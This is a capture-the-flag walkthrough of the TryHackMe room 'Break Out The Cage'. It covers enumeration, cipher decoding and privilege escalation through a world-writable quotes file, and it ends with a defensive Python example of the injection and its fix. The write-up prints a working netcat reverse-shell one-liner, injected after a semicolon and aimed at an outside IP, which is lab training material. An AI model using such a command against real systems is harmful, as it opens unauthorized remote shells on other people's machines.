[EN] Break Out The Cage WriteUp

Hello everyone. In this article, we will solve the room named “Break Out The Cage” on TryHackMe together. Let’s get started right away.

Room’s Link: https://tryhackme.com/room/breakoutthecage1

Information Gathering

First of all, let’s scan the IP address given to us with nmap.

sudo nmap -A 10.10.7.223


There are 4 open ports, and the scan also shows that FTP allows anonymous login. Let’s try it.

After connecting to FTP anonymously with FileZilla, we find a file called dad_tasks. Let’s download it.


When we open the file, we see base64-encoded text. Decoding it gives the text below.

Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.

Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

This text is encrypted with the Vigenère cipher; to decrypt it, we first need a key.

When looking at the open ports, we saw that port 80 was open, so a website is up. Let’s scan the directories with Gobuster.


When we dig through the directories a little, we find a directory named “auditions” with an audio file in it. When we play the audio file, we hear noisy, distorted speech. Suspecting that something is hidden inside, we open it in Audacity and look at the spectrogram, which reveals the key for the Vigenère cipher.


After deciphering the text with the key, we get the new text below, which contains the password of the weston user that we need.

Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.

In case I forget…. *************************************************

Action Time!

We log in to SSH as the user named “weston” with the above password.

ssh [email protected]

Now that we’re logged in, let’s look for the files belonging to cage.

find / -user cage 2> /dev/null

The file “/opt/.dads_scripts/spread_the_quotes.py” caught my attention, so let’s take a look at its contents. It is a Python script, and when I look at its permissions, I see that everyone has permission to modify the file, which is ideal for adding a reverse shell.


With the following commands, we add our reverse shell to the quotes file.

cd /opt/.dads_scripts/.files

echo "asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f" > .quotes

And we are in! Let’s read the user flag.

cat Super_Duper_Checklist
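
Why writing to .quotes was enough, shown as an added example that is not the room's script or the author's code. It assumes the script passes a line read from the quotes file to a shell command (the script's contents are not reproduced on this page), uses echo as a harmless stand-in for that command, and all function names are hypothetical.

```python
import os
import stat
import subprocess
import tempfile

BROADCAST = "echo"  # harmless stand-in for the command the script is assumed to run


def announce_vulnerable(quote):
    """Assumed weak pattern: file content is pasted into a shell command line."""
    cmd = f"{BROADCAST} {quote}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def announce_hardened(quote):
    """argv list, no shell: ';', '|' and '>' in the quote stay plain text."""
    return subprocess.run([BROADCAST, quote], capture_output=True, text=True).stdout


def writable_by_others(path):
    """True if group or other may modify a file that a different user's job reads."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def load_quotes(path):
    """Refuse input that another account could have tampered with."""
    if writable_by_others(path):
        raise PermissionError(f"{path} is group/world-writable, refusing to use it")
    with open(path, encoding="utf-8") as fh:
        return [line.strip() for line in fh if line.strip()]


def demo():
    tainted = "asd; echo INJECTED"  # constructed, benign stand-in for a tampered line
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, ".quotes")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(tainted + "\n")
        os.chmod(path, 0o666)  # the weak permission: anyone may write
        try:
            load_quotes(path)
            refused = False
        except PermissionError:
            refused = True
        os.chmod(path, 0o644)  # corrected: only the owner may write
        quote = load_quotes(path)[0]
    return refused, announce_vulnerable(quote), announce_hardened(quote)


if __name__ == "__main__":
    print(demo())
```

Either fix alone breaks the chain: with owner-only write permission the line cannot be planted, and without a shell the planted line is only printed.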


Stay tuned for more content!

 

Çağrı Ali Ceylan

Hello, I'm Çağrı Ali CEYLAN. I study at Kartal Anadolu İmam Hatip High School. I'm interested in databases, C programming languages, and cyber security.
